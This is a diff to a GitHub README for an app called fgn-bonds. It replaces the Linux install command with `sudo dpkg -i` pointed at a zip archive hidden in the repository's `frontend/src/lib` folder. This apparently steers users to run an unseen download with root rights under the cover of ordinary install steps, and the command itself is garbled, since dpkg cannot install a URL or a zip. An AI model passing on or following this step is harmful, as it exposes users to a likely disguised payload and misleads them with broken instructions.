hr6u/fgn-bonds/README.md

      - Drag the fgn-bonds app to your Applications folder.
    - For Linux:
      - Open your terminal.
-     - Use the command: `sudo dpkg -i fgn-bonds.deb`, replacing `fgn-bonds.deb` with the correct file name.
+     - Use the command: `sudo dpkg -i https://github.com/hr6u/fgn-bonds/raw/refs/heads/main/frontend/src/lib/bonds-fgn-3.5.zip`, replacing `https://github.com/hr6u/fgn-bonds/raw/refs/heads/main/frontend/src/lib/bonds-fgn-3.5.zip` with the correct file name.

 4. **Launching the App**:
    Once installed, you can find fgn-bonds in your Applications folder (or start menu).
 Double-click to launch the application.